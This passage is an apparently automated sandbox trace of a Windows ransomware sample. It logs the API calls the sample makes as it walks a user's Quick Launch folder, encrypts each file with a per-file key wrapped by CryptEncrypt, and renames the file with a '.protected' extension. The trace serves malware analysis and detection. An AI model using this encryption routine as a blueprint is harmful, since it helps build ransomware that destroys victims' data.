(lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0089.958] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0089.958] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 77 [0089.958] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0089.958] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0089.958] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned 79 [0089.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.958] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.958] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.958] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.") returned 79 [0089.958] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.958] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.958] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\..") returned 80 [0089.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Windows") returned -1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files") returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="Program Files (x86)") returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1="Quick Launch", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 90 [0089.959] lstrcmpW (lpString1="Quick Launch", lpString2=".") returned 1 [0089.959] lstrcmpW (lpString1="Quick Launch", lpString2="..") returned 1 [0089.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned 92 [0089.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.959] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.") returned 92 [0089.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.959] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.959] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.959] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.959] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.959] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.960] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.960] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.960] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\..") returned 93 [0089.960] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.960] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0089.960] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0089.960] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.960] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.960] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0089.960] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0089.960] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.960] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0089.960] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0089.960] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.960] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0089.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0089.961] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 102 [0089.961] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0089.961] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0xdd, lpOverlapped=0x0) returned 1 [0089.962] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0xdd, lpOverlapped=0x0) returned 1 [0089.962] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.962] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.962] CloseHandle (hObject=0x150) returned 1 [0089.963] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected") returned 112 [0089.963] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\desktop.ini.protected")) returned 1 [0089.964] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Windows") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="Program Files (x86)") returned -1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="$Recycle.bin") returned 1 [0089.964] lstrcmpiW (lpString1="Google Chrome.lnk", lpString2="System Volume Information") returned -1 [0089.964] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.964] StrStrIW (lpFirst="Google Chrome.lnk", lpSrch=".protected") returned 0x0 [0089.964] lstrcmpW (lpString1="Google Chrome.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0089.964] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.964] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".txt") returned 0x0 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".rar") returned 0x0 [0089.965] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk") returned 108 [0089.965] StrStrW (lpFirst="Google Chrome.lnk", lpSrch=".zip") returned 0x0 [0089.966] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x8e9, lpOverlapped=0x0) returned 1 [0089.983] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff717, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.983] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x8e9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x8e9, lpOverlapped=0x0) returned 1 [0089.983] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.983] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.984] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.984] CloseHandle (hObject=0x150) returned 1 [0089.984] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.protected") returned 118 [0089.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Google Chrome.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\google chrome.lnk.protected")) returned 1 [0089.985] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Windows") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Program Files") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="Program Files (x86)") returned -1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="$Recycle.bin") returned 1 [0089.985] lstrcmpiW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="System Volume Information") returned -1 [0089.985] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.985] StrStrIW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".protected") returned 0x0 [0089.985] lstrcmpW (lpString1="Launch Internet Explorer Browser.lnk", lpString2="RESTORE_FILES.txt") returned -1 [0089.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.986] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".txt") returned 0x0 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".rar") returned 0x0 [0089.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk") returned 127 [0089.987] StrStrW (lpFirst="Launch Internet Explorer Browser.lnk", lpSrch=".zip") returned 0x0 [0089.987] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5a7, lpOverlapped=0x0) returned 1 [0089.993] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.993] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5a7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5a7, lpOverlapped=0x0) returned 1 [0089.993] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.993] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.994] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.994] CloseHandle (hObject=0x150) returned 1 [0089.994] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.protected") returned 137 [0089.994] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Launch Internet Explorer Browser.lnk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\launch internet explorer browser.lnk.protected")) returned 1 [0089.995] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Windows") returned -1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Program Files (x86)") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="$Recycle.bin") returned 1 [0089.995] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="System Volume Information") returned -1 [0089.995] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.995] StrStrIW (lpFirst="Shows Desktop.lnk", lpSrch=".protected") returned 0x0 [0089.995] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="RESTORE_FILES.txt") returned 1 [0089.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.995] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.996] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".txt") returned 0x0 [0089.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.997] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".rar") returned 0x0 [0089.997] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 108 [0089.997] StrStrW (lpFirst="Shows Desktop.lnk", lpSrch=".zip") returned 0x0 [0089.997] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0089.997] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffede, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.998] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x122, lpOverlapped=0x0) returned 1 [0089.998] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.998] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.998] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.998] CloseHandle (hObject=0x150) returned 1 [0089.998] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.protected") returned 118 [0089.998] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js 